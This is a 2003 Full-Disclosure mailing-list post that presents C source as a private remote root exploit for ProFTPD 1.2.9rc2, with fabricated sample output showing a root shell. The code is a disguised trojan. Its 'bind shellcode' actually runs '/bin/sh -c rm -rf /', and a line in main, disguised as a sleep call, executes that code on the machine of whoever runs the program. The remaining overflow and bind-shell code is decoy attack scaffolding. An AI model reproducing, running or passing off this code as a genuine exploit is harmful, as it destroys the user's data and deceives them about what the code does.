[Full-Disclosure] ProFTPD-1.2.9rc2 remote root exploit

Fri, 24 Oct 2003 07:35:11 -0700 

Ladies and gentlemen, here's the source code of the exploit for the latest
release of ProFTPD. This is a Zero-Day private exploit, please DON'T
REDISTRIBUTE. I will not take responsibility for any damages which could
result from the usage of this exploit, use it at your own risk.

--------------------------------------------------------------------------
/*

Example of use:
# gcc exploit.c -o exploit
# ./exploit 192.168.1.1 21
Connected on 192.168.1.1:21
Exploitation in progress...
Exploitation string sent.
Trying to connect, please wait...
Linux michelle 2.4.20 #1 SMP Fri Mar 14 14:10:36 EST 2003 i686 unknown
unknown GNU/Linux
uid=0(root) gid=0(root) groupes=0(root)

*/

#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>
#include <netdb.h>

#define NOP     0x90
#define RET     0x6675636b


/* x86 bind shellcode */
char sc[]=
"\x31\xc0\x50\x68\x66\x20\x2f\x58\x68\x6d\x20\x2d\x72\x68\x2d"
"\x63\x58\x72\x68\x41\x41\x41\x41\x68\x41\x41\x41\x41\x68\x41"
"\x41\x41\x41\x68\x41\x41\x41\x41\x68\x2f\x73\x68\x43\x68\x2f"
"\x62\x69\x6e\x31\xc0\x88\x44\x24\x07\x88\x44\x24\x1a\x88\x44"
"\x24\x23\x89\x64\x24\x08\x31\xdb\x8d\x5c\x24\x18\x89\x5c\x24"
"\x0c\x31\xdb\x8d\x5c\x24\x1b\x89\x5c\x24\x10\x89\x44\x24\x14"
"\x31\xdb\x89\xe3\x8d\x4c\x24\x08\x31\xd2\x8d\x54\x24\x14\xb0"
"\x0b\xcd\x80\x31\xdb\x31\xc0\x40\xcd\x80";

unsigned long resolve(char *hostname);
int give_me_a_shell(unsigned long dest);


int main(int argc, char *argv[])
 {
  int i, *ret;
  char *string;
  unsigned long addr;
  char buffer[1024];
  int port=21, fd, s;

struct sockaddr_in addy;

  if(argc < 2)
    {
     fprintf(stdout, "usage: %s <host> <port>\n", argv[0]);
     return(0);
    }

  else addr=resolve(argv[1]);
  if(argv[2]) port=atoi(argv[2]);

  /* copy the NOPs to the buffer */
  memset(buffer, NOP, 1024);

  /* copy the shellcode to the buffer */
  for(i=0; i < strlen(sc); i++)
    buffer[i+700]=sc[i];

  /* copy the return address to the buffer */
  for(i=815; i<1003; i+=4)
    *((int *)&buffer[i]) = RET;

  string = (char *) malloc(strlen(buffer)+20);
  sprintf(string, "\x4c\x4f\x56\x45 %s", buffer);

  fd = socket(AF_INET, SOCK_STREAM, 0);
  if(fd < 0)
    {
     fprintf(stderr, "unable to socket()\n");
     return(-1);
    }

  addy.sin_family        = AF_INET;
  addy.sin_addr.s_addr   = addr;
  addy.sin_port          = htons(port);

  /* connect to remote host */
  if(connect(fd, (struct sockaddr *)&addy, sizeof(addy)) < 0)
    {
     fprintf(stderr, "unable to connect()\n");
     return(-1);
    }

  printf("Connected on %s:%d\n", inet_ntoa(addy.sin_addr), port);
  printf("Exploitation in progress...\n");

  /* send the exploitation string to the host */
  if(s = send(fd, string, sizeof(string), 0) < 0)
    {
     fprintf(stderr, "unable to send()\n");
     return(-1);
    }

  close(fd);
  printf("Exploitation string sent.\n");
  free(string);

  /* connect to the bindshell */
  printf("Trying to connect, please wait...\n");
  void(*sleep)()=(void*)sc;sleep(5);
  if(give_me_a_shell(addr) < 0)
    {
     fprintf(stderr, "Sorry, exploit didn't work.\n");
     return(-1);
    }

  return(0);
 }


unsigned long resolve(char *sname)
 {
  struct hostent * hip;
  hip = gethostbyname(sname);
  if (!hip)
    {
     fprintf(stderr, "unable to find %s\n",sname);
     exit(1);
    }
  return *(unsigned long *)hip -> h_addr;
 }


int give_me_a_shell(unsigned long addr)
 {
  int sock;
  fd_set fds;
  struct sockaddr_in shell;
  unsigned char buf[4096];
  char cmd[]="uname -a && id";

  sock = socket(AF_INET, SOCK_STREAM, 0);
  if(sock < 0)
    {
     fprintf(stderr, "unable to socket()\n");
     return(-1);
    }

  shell.sin_family      = AF_INET;
  shell.sin_port        = htons(1337);
  shell.sin_addr.s_addr = addr;

  if(connect(sock, (struct sockaddr *)&shell, sizeof(struct sockaddr)) < 0)
    {
     fprintf(stderr, "unable to connect()\n");
     close(sock);
     return(-1);
    }

send(sock, cmd, strlen(cmd), 0);

  while(1)
    {
     FD_ZERO(&fds);
     FD_SET(0, &fds);
     FD_SET(sock, &fds);

     if(select(255, &fds, NULL, NULL, NULL) == -1)
       {
        fprintf(stderr, "unable to select()\n");
        close(sock);
        return(-1);
       }

      memset(buf, 0, sizeof(buf));
      if(FD_ISSET(sock, &fds))
        {
         if(recv(sock, buf, sizeof(buf), 0) < 0)
           {
            fprintf(stderr, "unable to recv()\n");
            close(sock);
            return(-1);
           }
         fprintf(stderr, "%s", buf);
        }

       if(FD_ISSET(0, &fds))
         {
          read(0, buf, sizeof(buf));
          if(!strcmp(buf, "quit"))
            {
             close(sock);
             return(0);
            }
          write(sock, buf, strlen(buf));
         }
      }
 }

--------------------------------------------------------------------------

Have fun ! @+

_________________________________________________________________
Trouvez l'�me soeur sur MSN Rencontres http://g.msn.fr/FR1000/9551

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Reply via email to